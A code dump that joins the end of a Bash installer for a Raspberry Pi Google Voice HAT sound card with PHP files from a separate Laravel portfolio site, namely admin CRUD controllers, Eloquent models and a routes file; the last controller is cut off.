osdeny=( "Darwin" "Kali" ) # list os-releases specifically disallowed
FORCE=$1
DEVICE_TREE=true
ASK_TO_REBOOT=false
CURRENT_SETTING=false
UPDATE_DB=false
BOOTCMD=/boot/cmdline.txt
CONFIG=/boot/config.txt
APTSRC=/etc/apt/sources.list
INITABCONF=/etc/inittab
BLACKLIST=/etc/modprobe.d/raspi-blacklist.conf
LOADMOD=/etc/modules
DTBODIR=/boot/overlays
# function define
confirm() {
if [ "$FORCE" == '-y' ]; then
true
else
read -r -p "$1 [y/N] " response < /dev/tty
if [[ $response =~ ^(yes|y|Y)$ ]]; then
true
else
false
fi
fi
}
prompt() {
read -r -p "$1 [y/N] " response < /dev/tty
if [[ $response =~ ^(yes|y|Y)$ ]]; then
true
else
false
fi
}
success() {
echo -e "$(tput setaf 2)$1$(tput sgr0)"
}
inform() {
echo -e "$(tput setaf 6)$1$(tput sgr0)"
}
warning() {
echo -e "$(tput setaf 1)$1$(tput sgr0)"
}
newline() {
echo ""
}
progress() {
count=0
until [ $count -eq $1 ]; do
echo -n "..." && sleep 1
((count++))
done
echo
}
sudocheck() {
if [ $(id -u) -ne 0 ]; then
echo -e "Install must be run as root. Try 'sudo ./$scriptname'\n"
exit 1
fi
}
sysclean() {
sudo apt-get clean && sudo apt-get autoclean
sudo apt-get -y autoremove &> /dev/null
}
sysupdate() {
if ! $UPDATE_DB; then
echo "Updating apt indexes..." && progress 3 &
sudo apt-get update 1> /dev/null || { warning "Apt failed to update indexes!" && exit 1; }
echo "Reading package lists..."
progress 3 && UPDATE_DB=true
fi
}
sysupgrade() {
sudo apt-get upgrade
sudo apt-get clean && sudo apt-get autoclean
sudo apt-get -y autoremove &> /dev/null
}
sysreboot() {
warning "Some changes made to your system require"
warning "your computer to reboot to take effect."
newline
if prompt "Would you like to reboot now?"; then
sync && sudo reboot
fi
}
arch_check() {
IS_ARMHF=false
IS_ARMv6=false
IS_ARMv7=false
IS_ARMv8=false
if uname -m | grep "armv.l" > /dev/null; then
IS_ARMHF=true
if uname -m | grep "armv6l" > /dev/null; then
IS_ARMv6=true
elif uname -m | grep "armv7l" > /dev/null; then
IS_ARMv7=true
fi
elif uname -m | grep "aarch64" > /dev/null; then
# 64-bit kernels report aarch64; treat as ARMv8-capable hardware
IS_ARMHF=true
IS_ARMv8=true
fi
}
os_check() {
IS_RASPBIAN=false
IS_MACOSX=false
IS_SUPPORTED=false
IS_EXPERIMENTAL=false
if [ -f /etc/os-release ]; then
if cat /etc/os-release | grep "Raspbian" > /dev/null; then
IS_RASPBIAN=true && IS_SUPPORTED=true
fi
if command -v apt-get > /dev/null; then
for os in ${osreleases[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
fi
done
for os in ${oswarning[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=true
fi
done
for os in ${osdeny[@]}; do
if cat /etc/os-release | grep $os > /dev/null; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
fi
if [ -d ~/.kano-settings ] || [ -d ~/.kanoprofile ]; then
IS_RASPBIAN=false
for os in ${oswarning[@]}; do
if [ $os == "Kano" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=true
fi
done
for os in ${osdeny[@]}; do
if [ $os == "Kano" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if [ -f ~/.pt-dashboard-config ] || [ -d ~/.pt-dashboard ]; then
IS_RASPBIAN=false
for os in ${oswarning[@]}; do
if [ $os == "PiTop" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=true
fi
done
for os in ${osdeny[@]}; do
if [ $os == "PiTop" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if [ -d ~/.config/ubuntu-mate ]; then
for os in ${osdeny[@]}; do
if [ $os == "Mate" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
if uname -s | grep "Darwin" > /dev/null; then
IS_MACOSX=true
for os in ${osdeny[@]}; do
if [ $os == "Darwin" ]; then
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
done
fi
}
raspbian_check() {
IS_SUPPORTED=false
IS_EXPERIMENTAL=false
if [ -f /etc/os-release ]; then
if cat /etc/os-release | grep "/sid" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "stretch" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "jessie" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
elif cat /etc/os-release | grep "wheezy" > /dev/null; then
IS_SUPPORTED=true && IS_EXPERIMENTAL=false
else
IS_SUPPORTED=false && IS_EXPERIMENTAL=false
fi
fi
}
: <<'MAINSTART'
Perform all global variables declarations as well as function definition
above this section for clarity, thanks!
MAINSTART
# checks and init
arch_check
os_check
if [ $debugmode != "no" ]; then
echo "USER_HOME is $USER_HOME" && newline
echo "IS_RASPBIAN is $IS_RASPBIAN"
echo "IS_MACOSX is $IS_MACOSX"
echo "IS_SUPPORTED is $IS_SUPPORTED"
echo "IS_EXPERIMENTAL is $IS_EXPERIMENTAL"
newline
fi
if ! $IS_ARMHF; then
warning "This hardware is not supported, sorry!"
warning "Config files have been left untouched"
newline && exit 1
fi
if $IS_ARMv8 && [ $armv8 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
elif $IS_ARMv7 && [ $armv7 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
elif $IS_ARMv6 && [ $armv6 == "no" ]; then
warning "Sorry, your CPU is not supported by this installer"
newline && exit 1
fi
if [ $raspbianonly == "yes" ] && ! $IS_RASPBIAN;then
warning "This script is intended for Raspbian on a Raspberry Pi!"
newline && exit 1
fi
if $IS_RASPBIAN; then
raspbian_check
if ! $IS_SUPPORTED && ! $IS_EXPERIMENTAL; then
newline && warning "--- Warning ---" && newline
echo "The $productname installer"
echo "does not work on this version of Raspbian."
echo "Check https://github.com/$gitusername/$gitreponame"
echo "for additional information and support"
newline && exit 1
fi
fi
if ! $IS_SUPPORTED && ! $IS_EXPERIMENTAL; then
warning "Your operating system is not supported, sorry!"
newline && exit 1
fi
if $IS_EXPERIMENTAL; then
warning "Support for your operating system is experimental. Please visit"
newline
fi
if [ $forcesudo == "yes" ]; then
sudocheck
fi
newline
echo "This script will install everything needed to use"
echo "$productname"
newline
if confirm "Do you wish to continue?"; then
newline
echo "Checking hardware requirements..."
if [ -e $CONFIG ] && grep -q "^device_tree=$" $CONFIG; then
DEVICE_TREE=false
fi
if $DEVICE_TREE; then
newline
echo "Adding Device Tree Entry to $CONFIG"
if [ -e $CONFIG ] && grep -q "^dtoverlay=hifiberry-dac$" $CONFIG; then
echo "dtoverlay already active"
sudo sed -i -e '/^dtoverlay=hifiberry-dac/d' $CONFIG
fi
if [ -e $CONFIG ] && grep -q "^dtoverlay=googlevoicehat-soundcard$" $CONFIG; then
echo "dtoverlay already active"
else
echo "dtoverlay=googlevoicehat-soundcard" | sudo tee -a $CONFIG
ASK_TO_REBOOT=true
fi
if [ -e $BLACKLIST ]; then
newline
echo "Commenting out Blacklist entry in "
echo "$BLACKLIST"
sudo sed -i -e "s|^blacklist[[:space:]]*i2c-bcm2708.*|#blacklist i2c-bcm2708|" \
-e "s|^blacklist[[:space:]]*snd-soc-pcm512x.*|#blacklist snd-soc-pcm512x|" \
-e "s|^blacklist[[:space:]]*snd-soc-wm8804.*|#blacklist snd-soc-wm8804|" $BLACKLIST &> /dev/null
fi
else
newline
echo "No Device Tree Detected, not supported"
newline
exit 1
fi
if [ -e $CONFIG ] && grep -q -E "^dtparam=audio=on$" $CONFIG; then
bcm2835off="no"
newline
echo "Disabling default sound driver"
sudo sed -i "s|^dtparam=audio=on$|#dtparam=audio=on|" $CONFIG &> /dev/null
if [ -e $LOADMOD ] && grep -q "^snd-bcm2835" $LOADMOD; then
sudo sed -i "s|^snd-bcm2835|#snd-bcm2835|" $LOADMOD &> /dev/null
fi
ASK_TO_REBOOT=true
elif [ -e $LOADMOD ] && grep -q "^snd-bcm2835" $LOADMOD; then
bcm2835off="no"
newline
echo "Disabling default sound module"
sudo sed -i "s|^snd-bcm2835|#snd-bcm2835|" $LOADMOD &> /dev/null
ASK_TO_REBOOT=true
else
newline
echo "Default sound driver currently not loaded"
bcm2835off="yes"
fi
echo "Configuring sound output"
if [ -e /etc/asound.conf ]; then
if [ -e /etc/asound.conf.old ]; then
sudo rm -f /etc/asound.conf.old
fi
sudo mv /etc/asound.conf /etc/asound.conf.old
fi
sudo echo -e "options snd_rpi_googlevoicehat_soundcard index=0\n" > ~/asound.conf
sudo echo -e "pcm.softvol {\ntype softvol" >> ~/asound.conf
sudo echo -e "slave.pcm dmix \ncontrol{" >> ~/asound.conf
sudo echo -e "name Master\ncard 0\n}\n}\n" >>~/asound.conf
sudo echo -e "pcm.micboost{\ntype softvol" >>~/asound.conf
sudo echo -e "slave.pcm dsnoop\ncontrol {" >>~/asound.conf
sudo echo -e "name Micro\ncard 0\n}" >>~/asound.conf
sudo echo -e "min_dB -10.0" >>~/asound.conf
sudo echo -e "max_dB 50.0" >>~/asound.conf
sudo echo -e "resolution 256}\n" >>~/asound.conf
sudo echo -e "pcm.!default { \ntype asym" >>~/asound.conf
sudo echo -e "playback.pcm \042plug:softvol\042" >>~/asound.conf
sudo echo -e "capture.pcm \042plug:micboost\042\n}\n" >>~/asound.conf
sudo echo -e "ctl.!default {\ntype hw\ncard 0\n}\n" >>~/asound.conf
sudo mv ~/asound.conf /etc/asound.conf
sudo cp /etc/asound.conf /home/pi/.asoundrc
sleep 1
sudo chown pi /home/pi/.asoundrc
sudo chgrp pi /home/pi/.asoundrc
if [ $promptreboot == "yes" ] || $ASK_TO_REBOOT; then
sysreboot
fi
else
newline
echo "Aborting..."
newline
fi
exit 0
| 0da6ee4b29d7db2db0b46ad7101f5b7a6379908d | ["Markdown", "C", "Python", "Shell"] | 7 | Shell | AzureMentor/LoveBirds | 8472fbe42f414e04022cabf522f6d9241cae7f74 | 00684f141e765b0218a55a8833a49d7606d18e9f | refs/heads/master |
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skilllang;
use App\Http\Requests\CreateSkilllangRequest;
use App\Http\Requests\UpdateSkilllangRequest;
use Illuminate\Http\Request;
use App\User;
class SkilllangController extends Controller {
/**
* Display a listing of skilllang
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skilllang = Skilllang::with("user")->get();
return view('admin.skilllang.index', compact('skilllang'));
}
/**
* Show the form for creating a new skilllang
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
$skill_range = Skilllang::$skill_range;
return view('admin.skilllang.create', compact("user", "skill_range"));
}
/**
* Store a newly created skilllang in storage.
*
* @param CreateSkilllangRequest|Request $request
*/
public function store(CreateSkilllangRequest $request)
{
Skilllang::create($request->all());
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Show the form for editing the specified skilllang.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skilllang = Skilllang::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
$skill_range = Skilllang::$skill_range;
return view('admin.skilllang.edit', compact('skilllang', "user", "skill_range"));
}
/**
* Update the specified skilllang in storage.
* @param UpdateSkilllangRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkilllangRequest $request)
{
$skilllang = Skilllang::findOrFail($id);
$skilllang->update($request->all());
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Remove the specified skilllang from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skilllang::destroy($id);
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skilllang::destroy($toDelete);
} else {
Skilllang::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skilllang.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Status extends Model {
protected $table = 'status';
protected $fillable = [
'user_id',
'icon',
'detail'
];
public static $icon = ["green-marker" => "green-marker", "red-marker" => "red-marker", "orange-marker" => "orange-marker"];
public static function boot()
{
parent::boot();
Status::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Catportfolio;
use App\Http\Requests\CreateCatportfolioRequest;
use App\Http\Requests\UpdateCatportfolioRequest;
use Illuminate\Http\Request;
class CatportfolioController extends Controller {
/**
* Display a listing of catportfolio
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$catportfolio = Catportfolio::all();
return view('admin.catportfolio.index', compact('catportfolio'));
}
/**
* Show the form for creating a new catportfolio
*
* @return \Illuminate\View\View
*/
public function create()
{
return view('admin.catportfolio.create');
}
/**
* Store a newly created catportfolio in storage.
*
* @param CreateCatportfolioRequest|Request $request
*/
public function store(CreateCatportfolioRequest $request)
{
Catportfolio::create($request->all());
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Show the form for editing the specified catportfolio.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$catportfolio = Catportfolio::find($id);
return view('admin.catportfolio.edit', compact('catportfolio'));
}
/**
* Update the specified catportfolio in storage.
* @param UpdateCatportfolioRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateCatportfolioRequest $request)
{
$catportfolio = Catportfolio::findOrFail($id);
$catportfolio->update($request->all());
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Remove the specified catportfolio from storage.
*
* @param int $id
*/
public function destroy($id)
{
Catportfolio::destroy($id);
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Catportfolio::destroy($toDelete);
} else {
Catportfolio::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.catportfolio.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skilladd;
use App\Http\Requests\CreateSkilladdRequest;
use App\Http\Requests\UpdateSkilladdRequest;
use Illuminate\Http\Request;
use App\User;
class SkilladdController extends Controller {
/**
* Display a listing of skilladd
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skilladd = Skilladd::with("user")->get();
return view('admin.skilladd.index', compact('skilladd'));
}
/**
* Show the form for creating a new skilladd
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skilladd.create', compact("user"));
}
/**
* Store a newly created skilladd in storage.
*
* @param CreateSkilladdRequest|Request $request
*/
public function store(CreateSkilladdRequest $request)
{
Skilladd::create($request->all());
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Show the form for editing the specified skilladd.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skilladd = Skilladd::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skilladd.edit', compact('skilladd', "user"));
}
/**
* Update the specified skilladd in storage.
* @param UpdateSkilladdRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkilladdRequest $request)
{
$skilladd = Skilladd::findOrFail($id);
$skilladd->update($request->all());
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Remove the specified skilladd from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skilladd::destroy($id);
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skilladd::destroy($toDelete);
} else {
Skilladd::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skilladd.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Bcat;
use App\Http\Requests\CreateBcatRequest;
use App\Http\Requests\UpdateBcatRequest;
use Illuminate\Http\Request;
class BcatController extends Controller {
/**
* Display a listing of bcat
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$bcat = Bcat::all();
return view('admin.bcat.index', compact('bcat'));
}
/**
* Show the form for creating a new bcat
*
* @return \Illuminate\View\View
*/
public function create()
{
return view('admin.bcat.create');
}
/**
* Store a newly created bcat in storage.
*
* @param CreateBcatRequest|Request $request
*/
public function store(CreateBcatRequest $request)
{
Bcat::create($request->all());
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Show the form for editing the specified bcat.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$bcat = Bcat::find($id);
return view('admin.bcat.edit', compact('bcat'));
}
/**
* Update the specified bcat in storage.
* @param UpdateBcatRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateBcatRequest $request)
{
$bcat = Bcat::findOrFail($id);
$bcat->update($request->all());
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Remove the specified bcat from storage.
*
* @param int $id
*/
public function destroy($id)
{
Bcat::destroy($id);
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Bcat::destroy($toDelete);
} else {
Bcat::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.bcat.index');
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| This file is where you may define all of the routes that are handled
| by your application. Just tell Laravel the URIs it should respond
| to using a Closure or controller method. Build something great!
|
*/
//Route::get('/', function () {
// return view('welcome');
//});
Route::get('/404', function () {
return view('errors/404');
});
Route::get('/post', function () {
return view('front-end/post-img');
});
Route::get('custom-pagination','BlogController@index');
//route middleware group
Route::group(['middleware'=>['web']], function()
{
Route::resource('/','HomeController');
Route::resource('/profile','ProfileController');
Route::resource('/resume','ResumeController');
Route::resource('/portfolio','PortfolioController');
Route::resource('/blog','BlogController');
Route::resource('/category','CategoryController');
Route::resource('/contact','ContactController');
});<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
use Illuminate\Database\Eloquent\SoftDeletes;
class Blog1 extends Model {
use SoftDeletes;
/**
* The attributes that should be mutated to dates.
*
* @var array
*/
protected $dates = ['deleted_at'];
protected $table = 'blog1';
protected $fillable = [
'bcat_id',
'user_id',
'title',
'pict',
'desc',
'isi'
];
public static function boot()
{
parent::boot();
Blog1::observe(new UserActionsObserver);
}
public function bcat()
{
return $this->hasOne('App\Bcat', 'id', 'bcat_id');
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Hobby;
use App\Http\Requests\CreateHobbyRequest;
use App\Http\Requests\UpdateHobbyRequest;
use Illuminate\Http\Request;
use App\User;
class HobbyController extends Controller {
/**
* Display a listing of hobby
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$hobby = Hobby::with("user")->get();
return view('admin.hobby.index', compact('hobby'));
}
/**
* Show the form for creating a new hobby
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.hobby.create', compact("user"));
}
/**
* Store a newly created hobby in storage.
*
* @param CreateHobbyRequest|Request $request
*/
public function store(CreateHobbyRequest $request)
{
Hobby::create($request->all());
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Show the form for editing the specified hobby.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$hobby = Hobby::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.hobby.edit', compact('hobby', "user"));
}
/**
* Update the specified hobby in storage.
* @param UpdateHobbyRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateHobbyRequest $request)
{
$hobby = Hobby::findOrFail($id);
$hobby->update($request->all());
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Remove the specified hobby from storage.
*
* @param int $id
*/
public function destroy($id)
{
Hobby::destroy($id);
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Hobby::destroy($toDelete);
} else {
Hobby::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.hobby.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Education;
use App\Http\Requests\CreateEducationRequest;
use App\Http\Requests\UpdateEducationRequest;
use Illuminate\Http\Request;
use App\User;
class EducationController extends Controller {
/**
* Display a listing of education
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$education = Education::with("user")->get();
return view('admin.education.index', compact('education'));
}
/**
* Show the form for creating a new education
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.education.create', compact("user"));
}
/**
* Store a newly created education in storage.
*
* @param CreateEducationRequest|Request $request
*/
public function store(CreateEducationRequest $request)
{
Education::create($request->all());
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Show the form for editing the specified education.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$education = Education::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.education.edit', compact('education', "user"));
}
/**
* Update the specified education in storage.
* @param UpdateEducationRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateEducationRequest $request)
{
$education = Education::findOrFail($id);
$education->update($request->all());
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Remove the specified education from storage.
*
* @param int $id
*/
public function destroy($id)
{
Education::destroy($id);
return redirect()->route(config('quickadmin.route').'.education.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Education::destroy($toDelete);
} else {
Education::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.education.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Status;
use App\Http\Requests\CreateStatusRequest;
use App\Http\Requests\UpdateStatusRequest;
use Illuminate\Http\Request;
use App\User;
class StatusController extends Controller {
/**
* Display a listing of status
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$status = Status::with("user")->get();
return view('admin.status.index', compact('status'));
}
/**
* Show the form for creating a new status
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
$icon = Status::$icon;
return view('admin.status.create', compact("user", "icon"));
}
/**
* Store a newly created status in storage.
*
* @param CreateStatusRequest|Request $request
*/
public function store(CreateStatusRequest $request)
{
Status::create($request->all());
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Show the form for editing the specified status.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$status = Status::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
$icon = Status::$icon;
return view('admin.status.edit', compact('status', "user", "icon"));
}
/**
* Update the specified status in storage.
* @param UpdateStatusRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateStatusRequest $request)
{
$status = Status::findOrFail($id);
$status->update($request->all());
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Remove the specified status from storage.
*
* @param int $id
*/
public function destroy($id)
{
Status::destroy($id);
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Status::destroy($toDelete);
} else {
Status::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.status.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Portfolio1 extends Model {
protected $table = 'portfolio1';
protected $fillable = [
'catportfolio_id',
'title',
'desc',
'pict',
'detpict',
'complete',
'client',
'isi',
'url'
];
public static function boot()
{
parent::boot();
Portfolio1::observe(new UserActionsObserver);
}
public function catportfolio()
{
return $this->hasOne('App\Catportfolio', 'id', 'catportfolio_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Social;
use App\Http\Requests\CreateSocialRequest;
use App\Http\Requests\UpdateSocialRequest;
use Illuminate\Http\Request;
use App\User;
class SocialController extends Controller {
/**
* Display a listing of social
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$social = Social::with("user")->get();
return view('admin.social.index', compact('social'));
}
/**
* Show the form for creating a new social
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.social.create', compact("user"));
}
/**
* Store a newly created social in storage.
*
* @param CreateSocialRequest|Request $request
*/
public function store(CreateSocialRequest $request)
{
Social::create($request->all());
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Show the form for editing the specified social.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$social = Social::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.social.edit', compact('social', "user"));
}
/**
* Update the specified social in storage.
* @param UpdateSocialRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSocialRequest $request)
{
$social = Social::findOrFail($id);
$social->update($request->all());
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Remove the specified social from storage.
*
* @param int $id
*/
public function destroy($id)
{
Social::destroy($id);
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Social::destroy($toDelete);
} else {
Social::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.social.index');
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Http\Requests;
use App\Work;
use App\Education;
use App\Skillpro;
use App\Skilladd;
use App\Skilllang;
use App\Knowledge;
use App\Hobby;
use App\Experience;
class ResumeController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
//
$exp = Experience::find(1);
$hobi = Hobby::all();
$know = Knowledge::all();
$skl = Skilllang::all();
$ska = Skilladd::all();
$skp = Skillpro::all();
$edu = Education::all()->sortByDesc("id");
$work = Work::all()->sortByDesc("id");
$title = "Resume";
return view('front-end.resume', compact('work', 'edu', 'skp', 'ska', 'skl', 'know', 'hobi'))->with('title', $title)->with('exp', $exp);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
//
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
//
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
//
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
//
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Profile extends Model {
protected $table = 'profile';
protected $fillable = [
'user_id',
'address',
'phone',
'website',
'photo',
'about'
];
public static function boot()
{
parent::boot();
Profile::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Hobby extends Model {
protected $table = 'hobby';
protected $fillable = [
'user_id',
'icon',
'detail'
];
public static function boot()
{
parent::boot();
Hobby::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Portfolio1;
use App\Http\Requests\CreatePortfolio1Request;
use App\Http\Requests\UpdatePortfolio1Request;
use Illuminate\Http\Request;
use App\Http\Controllers\Traits\FileUploadTrait;
use App\Catportfolio;
class Portfolio1Controller extends Controller {
use FileUploadTrait;
/**
* Display a listing of portfolio1
*
